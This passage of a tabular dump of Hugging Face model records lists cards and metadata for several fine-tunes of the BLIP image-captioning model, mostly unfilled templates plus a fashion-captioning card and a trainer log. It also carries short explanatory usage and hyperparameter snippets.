""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""66fd6972bddfcf0a2b2600c5"", ""modelId"": ""shyamgv/blip-image-captioning-large-shyam-shyam"", ""usedStorage"": 9395100034}",2,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=shyamgv/blip-image-captioning-large-shyam-shyam&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bshyamgv%2Fblip-image-captioning-large-shyam-shyam%5D(%2Fshyamgv%2Fblip-image-captioning-large-shyam-shyam)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 447 |
+
welcometoFightclub/llmachatbot,"---
|
| 448 |
+
license: apache-2.0
|
| 449 |
+
language:
|
| 450 |
+
- en
|
| 451 |
+
base_model:
|
| 452 |
+
- Salesforce/blip-image-captioning-large
|
| 453 |
+
pipeline_tag: image-to-text
|
| 454 |
+
tags:
|
| 455 |
+
- code
|
| 456 |
+
---
|
| 457 |
+
|
| 458 |
+
# Model Card for Model ID
|
| 459 |
+
|
| 460 |
+
<!-- Provide a quick summary of what the model is/does. -->
|
| 461 |
+
|
| 462 |
+
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
|
| 463 |
+
|
| 464 |
+
## Model Details
|
| 465 |
+
|
| 466 |
+
### Model Description
|
| 467 |
+
|
| 468 |
+
<!-- Provide a longer summary of what this model is. -->
|
| 469 |
+
|
| 470 |
+
|
| 471 |
+
|
| 472 |
+
- **Developed by:** [More Information Needed]
|
| 473 |
+
- **Funded by [optional]:** [More Information Needed]
|
| 474 |
+
- **Shared by [optional]:** [More Information Needed]
|
| 475 |
+
- **Model type:** [More Information Needed]
|
| 476 |
+
- **Language(s) (NLP):** [More Information Needed]
|
| 477 |
+
- **License:** [More Information Needed]
|
| 478 |
+
- **Finetuned from model [optional]:** [More Information Needed]
|
| 479 |
+
|
| 480 |
+
### Model Sources [optional]
|
| 481 |
+
|
| 482 |
+
<!-- Provide the basic links for the model. -->
|
| 483 |
+
|
| 484 |
+
- **Repository:** [More Information Needed]
|
| 485 |
+
- **Paper [optional]:** [More Information Needed]
|
| 486 |
+
- **Demo [optional]:** [More Information Needed]
|
| 487 |
+
|
| 488 |
+
## Uses
|
| 489 |
+
|
| 490 |
+
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
|
| 491 |
+
|
| 492 |
+
### Direct Use
|
| 493 |
+
|
| 494 |
+
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
|
| 495 |
+
|
| 496 |
+
[More Information Needed]
|
| 497 |
+
|
| 498 |
+
### Downstream Use [optional]
|
| 499 |
+
|
| 500 |
+
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
|
| 501 |
+
|
| 502 |
+
[More Information Needed]
|
| 503 |
+
|
| 504 |
+
### Out-of-Scope Use
|
| 505 |
+
|
| 506 |
+
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
|
| 507 |
+
|
| 508 |
+
[More Information Needed]
|
| 509 |
+
|
| 510 |
+
## Bias, Risks, and Limitations
|
| 511 |
+
|
| 512 |
+
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
|
| 513 |
+
|
| 514 |
+
[More Information Needed]
|
| 515 |
+
|
| 516 |
+
### Recommendations
|
| 517 |
+
|
| 518 |
+
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
|
| 519 |
+
|
| 520 |
+
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
|
| 521 |
+
|
| 522 |
+
## How to Get Started with the Model
|
| 523 |
+
|
| 524 |
+
Use the code below to get started with the model.
|
| 525 |
+
|
| 526 |
+
[More Information Needed]
|
| 527 |
+
|
| 528 |
+
## Training Details
|
| 529 |
+
|
| 530 |
+
### Training Data
|
| 531 |
+
|
| 532 |
+
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
|
| 533 |
+
|
| 534 |
+
[More Information Needed]
|
| 535 |
+
|
| 536 |
+
### Training Procedure
|
| 537 |
+
|
| 538 |
+
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
|
| 539 |
+
|
| 540 |
+
#### Preprocessing [optional]
|
| 541 |
+
|
| 542 |
+
[More Information Needed]
|
| 543 |
+
|
| 544 |
+
|
| 545 |
+
#### Training Hyperparameters
|
| 546 |
+
|
| 547 |
+
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
|
| 548 |
+
|
| 549 |
+
#### Speeds, Sizes, Times [optional]
|
| 550 |
+
|
| 551 |
+
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
|
| 552 |
+
|
| 553 |
+
[More Information Needed]
|
| 554 |
+
|
| 555 |
+
## Evaluation
|
| 556 |
+
|
| 557 |
+
<!-- This section describes the evaluation protocols and provides the results. -->
|
| 558 |
+
|
| 559 |
+
### Testing Data, Factors & Metrics
|
| 560 |
+
|
| 561 |
+
#### Testing Data
|
| 562 |
+
|
| 563 |
+
<!-- This should link to a Dataset Card if possible. -->
|
| 564 |
+
|
| 565 |
+
[More Information Needed]
|
| 566 |
+
|
| 567 |
+
#### Factors
|
| 568 |
+
|
| 569 |
+
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
|
| 570 |
+
|
| 571 |
+
[More Information Needed]
|
| 572 |
+
|
| 573 |
+
#### Metrics
|
| 574 |
+
|
| 575 |
+
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
|
| 576 |
+
|
| 577 |
+
[More Information Needed]
|
| 578 |
+
|
| 579 |
+
### Results
|
| 580 |
+
|
| 581 |
+
[More Information Needed]
|
| 582 |
+
|
| 583 |
+
#### Summary
|
| 584 |
+
|
| 585 |
+
|
| 586 |
+
|
| 587 |
+
## Model Examination [optional]
|
| 588 |
+
|
| 589 |
+
<!-- Relevant interpretability work for the model goes here -->
|
| 590 |
+
|
| 591 |
+
[More Information Needed]
|
| 592 |
+
|
| 593 |
+
## Environmental Impact
|
| 594 |
+
|
| 595 |
+
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
|
| 596 |
+
|
| 597 |
+
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
|
| 598 |
+
|
| 599 |
+
- **Hardware Type:** [More Information Needed]
|
| 600 |
+
- **Hours used:** [More Information Needed]
|
| 601 |
+
- **Cloud Provider:** [More Information Needed]
|
| 602 |
+
- **Compute Region:** [More Information Needed]
|
| 603 |
+
- **Carbon Emitted:** [More Information Needed]
|
| 604 |
+
|
| 605 |
+
## Technical Specifications [optional]
|
| 606 |
+
|
| 607 |
+
### Model Architecture and Objective
|
| 608 |
+
|
| 609 |
+
[More Information Needed]
|
| 610 |
+
|
| 611 |
+
### Compute Infrastructure
|
| 612 |
+
|
| 613 |
+
[More Information Needed]
|
| 614 |
+
|
| 615 |
+
#### Hardware
|
| 616 |
+
|
| 617 |
+
[More Information Needed]
|
| 618 |
+
|
| 619 |
+
#### Software
|
| 620 |
+
|
| 621 |
+
[More Information Needed]
|
| 622 |
+
|
| 623 |
+
## Citation [optional]
|
| 624 |
+
|
| 625 |
+
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
|
| 626 |
+
|
| 627 |
+
**BibTeX:**
|
| 628 |
+
|
| 629 |
+
[More Information Needed]
|
| 630 |
+
|
| 631 |
+
**APA:**
|
| 632 |
+
|
| 633 |
+
[More Information Needed]
|
| 634 |
+
|
| 635 |
+
## Glossary [optional]
|
| 636 |
+
|
| 637 |
+
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
|
| 638 |
+
|
| 639 |
+
[More Information Needed]
|
| 640 |
+
|
| 641 |
+
## More Information [optional]
|
| 642 |
+
|
| 643 |
+
[More Information Needed]
|
| 644 |
+
|
| 645 |
+
## Model Card Authors [optional]
|
| 646 |
+
|
| 647 |
+
[More Information Needed]
|
| 648 |
+
|
| 649 |
+
## Model Card Contact
|
| 650 |
+
|
| 651 |
+
[More Information Needed]","{""id"": ""welcometoFightclub/llmachatbot"", ""author"": ""welcometoFightclub"", ""sha"": ""8d11c646cb045355065cb1f490a5b5ab89917aec"", ""last_modified"": ""2024-10-01 15:13:59+00:00"", ""created_at"": ""2024-10-01 15:03:53+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""code"", ""image-to-text"", ""en"", ""arxiv:1910.09700"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: image-to-text\ntags:\n- code"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-01 15:13:59+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: image-to-text\ntags:\n- code"", ""transformersInfo"": null, ""_id"": ""66fc0f598b49b3fbed4455f3"", ""modelId"": ""welcometoFightclub/llmachatbot"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=welcometoFightclub/llmachatbot&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BwelcometoFightclub%2Fllmachatbot%5D(%2FwelcometoFightclub%2Fllmachatbot)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
Jakapong/jakudon,"---
base_model:
- Salesforce/blip-image-captioning-large
---

# Model Card for Model ID

<!-- Provide a quick summary of what the model is/does. -->

This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).

## Model Details

### Model Description

<!-- Provide a longer summary of what this model is. -->

- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]

### Model Sources [optional]

<!-- Provide the basic links for the model. -->

- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]

## Uses

<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->

### Direct Use

<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->

[More Information Needed]

### Downstream Use [optional]

<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->

[More Information Needed]

### Out-of-Scope Use

<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->

[More Information Needed]

## Bias, Risks, and Limitations

<!-- This section is meant to convey both technical and sociotechnical limitations. -->

[More Information Needed]

### Recommendations

<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->

Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.

## How to Get Started with the Model

Use the code below to get started with the model.

[More Information Needed]

## Training Details

### Training Data

<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->

[More Information Needed]

### Training Procedure

<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->

#### Preprocessing [optional]

[More Information Needed]

#### Training Hyperparameters

- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->

#### Speeds, Sizes, Times [optional]

<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->

[More Information Needed]

## Evaluation

<!-- This section describes the evaluation protocols and provides the results. -->

### Testing Data, Factors & Metrics

#### Testing Data

<!-- This should link to a Dataset Card if possible. -->

[More Information Needed]

#### Factors

<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->

[More Information Needed]

#### Metrics

<!-- These are the evaluation metrics being used, ideally with a description of why. -->

[More Information Needed]

### Results

[More Information Needed]

#### Summary

## Model Examination [optional]

<!-- Relevant interpretability work for the model goes here -->

[More Information Needed]

## Environmental Impact

<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->

Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).

- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]

## Technical Specifications [optional]

### Model Architecture and Objective

[More Information Needed]

### Compute Infrastructure

[More Information Needed]

#### Hardware

[More Information Needed]

#### Software

[More Information Needed]

## Citation [optional]

<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->

**BibTeX:**

[More Information Needed]

**APA:**

[More Information Needed]

## Glossary [optional]

<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->

[More Information Needed]

## More Information [optional]

[More Information Needed]

## Model Card Authors [optional]

[More Information Needed]

## Model Card Contact

[More Information Needed]","{""id"": ""Jakapong/jakudon"", ""author"": ""Jakapong"", ""sha"": ""8adf83c45bb7f311ae78fec2ca3beade4445fab5"", ""last_modified"": ""2025-01-09 04:52:49+00:00"", ""created_at"": ""2025-01-09 04:51:22+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""arxiv:1910.09700"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-09 04:52:49+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large"", ""transformersInfo"": null, ""_id"": ""677f55cafdb4c42a512a9b51"", ""modelId"": ""Jakapong/jakudon"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Jakapong/jakudon&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BJakapong%2Fjakudon%5D(%2FJakapong%2Fjakudon)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
rcfg/FashionBLIP-1,"---
library_name: transformers
license: apache-2.0
tags:
- vision
- image-captioning
- blip
- multimodal
- fashion
datasets:
- Marqo/fashion200k
base_model:
- Salesforce/blip-image-captioning-large
---

# Fine-Tuned BLIP Model for Fashion Image Captioning

This is a fine-tuned BLIP (Bootstrapped Language-Image Pretraining) model specifically designed for **fashion image captioning**. It was fine-tuned on the **Marqo Fashion Dataset** to generate descriptive and contextually relevant captions for fashion-related images.

## Model Details

- **Model Type:** BLIP (Vision-Language Pretraining)
- **Architecture:** BLIP uses a multimodal transformer architecture to jointly model visual and textual information.
- **Fine-Tuning Dataset:** [Marqo Fashion Dataset](https://github.com/marqo-ai/marqo) (a dataset containing fashion images and corresponding captions)
- **Task:** Fashion Image Captioning
- **License:** Apache 2.0

## Usage

You can use this model with the Hugging Face `transformers` library for fashion image captioning tasks.

### Installation

First, install the required libraries:

```bash
pip install transformers torch","{""id"": ""rcfg/FashionBLIP-1"", ""author"": ""rcfg"", ""sha"": ""b3e7f12a9b2fcf14c1eb53567de99051e9cf4201"", ""last_modified"": ""2025-02-16 20:22:44+00:00"", ""created_at"": ""2025-02-16 19:43:23+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 845, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""vision"", ""image-captioning"", ""multimodal"", ""fashion"", ""dataset:Marqo/fashion200k"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- Marqo/fashion200k\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- vision\n- image-captioning\n- blip\n- multimodal\n- fashion"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-16 20:22:44+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- Marqo/fashion200k\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- vision\n- image-captioning\n- blip\n- multimodal\n- fashion"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67b23fdb365784ce7f625096"", ""modelId"": ""rcfg/FashionBLIP-1"", ""usedStorage"": 1879010480}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=rcfg/FashionBLIP-1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Brcfg%2FFashionBLIP-1%5D(%2Frcfg%2FFashionBLIP-1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
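The card's usage snippet is cut off above after the install step. A minimal captioning sketch, assuming the standard `transformers` BLIP captioning API (`BlipProcessor`/`BlipForConditionalGeneration`) and a hypothetical local image `dress.jpg`, might look like:

```python
import torch
from PIL import Image
from transformers import BlipProcessor, BlipForConditionalGeneration

# Sketch only: the model repo's config declares BlipForConditionalGeneration,
# so the generic BLIP captioning workflow should apply.
processor = BlipProcessor.from_pretrained('rcfg/FashionBLIP-1')
model = BlipForConditionalGeneration.from_pretrained('rcfg/FashionBLIP-1')

image = Image.open('dress.jpg').convert('RGB')  # hypothetical fashion image
inputs = processor(images=image, return_tensors='pt')
with torch.no_grad():
    out = model.generate(**inputs, max_new_tokens=30)
print(processor.decode(out[0], skip_special_tokens=True))
```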
manh08/blip-model,"---
base_model:
- Salesforce/blip-image-captioning-large
datasets:
- poloclub/diffusiondb
license: apache-2.0
language:
- aa
metrics:
- accuracy
- bertscore
new_version: Salesforce/blip-image-captioning-large
library_name: transformers
pipeline_tag: image-to-text
---","{""id"": ""manh08/blip-model"", ""author"": ""manh08"", ""sha"": ""1ace46ab34696fcd15ecc42586e1b17eb70d976a"", ""last_modified"": ""2025-03-01 18:01:25+00:00"", ""created_at"": ""2025-03-01 17:39:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""image-to-text"", ""aa"", ""dataset:poloclub/diffusiondb"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- poloclub/diffusiondb\nlanguage:\n- aa\nlibrary_name: transformers\nlicense: apache-2.0\nmetrics:\n- accuracy\n- bertscore\npipeline_tag: image-to-text\nnew_version: Salesforce/blip-image-captioning-large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test_part1.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-01 18:01:25+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- poloclub/diffusiondb\nlanguage:\n- aa\nlibrary_name: transformers\nlicense: apache-2.0\nmetrics:\n- accuracy\n- bertscore\npipeline_tag: image-to-text\nnew_version: Salesforce/blip-image-captioning-large"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""67c3466bfb3123b861c97592"", ""modelId"": ""manh08/blip-model"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=manh08/blip-model&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmanh08%2Fblip-model%5D(%2Fmanh08%2Fblip-model)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
saakshigupta/blip-finetuned-gradcam,"---
library_name: transformers
license: bsd-3-clause
base_model: Salesforce/blip-image-captioning-large
tags:
- generated_from_trainer
model-index:
- name: blip-finetuned-gradcam
  results: []
---

<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->

# blip-finetuned-gradcam

This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 9.4287

## Model description

More information needed

## Intended uses & limitations

More information needed

## Training and evaluation data

More information needed

## Training procedure

### Training hyperparameters

The following hyperparameters were used during training:
- learning_rate: 5e-06
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 10
- mixed_precision_training: Native AMP
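Note that total_train_batch_size is the effective batch size: train_batch_size × gradient_accumulation_steps = 2 × 8 = 16. As a rough sketch only (the authors' actual training script is not shown here), the same regime expressed with the standard `transformers` `TrainingArguments` would be:

```python
from transformers import TrainingArguments

# Sketch of the reported regime; output_dir is a placeholder name.
args = TrainingArguments(
    output_dir='blip-finetuned-gradcam',
    learning_rate=5e-6,
    per_device_train_batch_size=2,
    per_device_eval_batch_size=2,
    seed=42,
    gradient_accumulation_steps=8,   # effective batch size 2 * 8 = 16
    lr_scheduler_type='linear',
    num_train_epochs=10,
    fp16=True,                       # 'Native AMP' mixed precision
)
```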

### Training results

| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| No log | 1.0 | 3 | 9.6959 |
| 8.3512 | 2.0 | 6 | 9.6199 |
| 8.3512 | 3.0 | 9 | 9.5671 |
| 6.7447 | 4.0 | 12 | 9.5177 |
| 6.6894 | 5.0 | 15 | 9.4673 |
| 6.6894 | 6.0 | 18 | 9.4367 |
| 8.0605 | 6.8889 | 20 | 9.4287 |

### Framework versions

- Transformers 4.50.3
- Pytorch 2.6.0+cu124
- Datasets 3.5.0
- Tokenizers 0.21.1
","{""id"": ""saakshigupta/blip-finetuned-gradcam"", ""author"": ""saakshigupta"", ""sha"": ""7b2cf98dd62d90fd171d2ee1bb13e4341abf9fbe"", ""last_modified"": ""2025-04-07 15:05:09+00:00"", ""created_at"": ""2025-04-07 14:30:56+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 17, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-finetuned-gradcam"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/vocab.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, 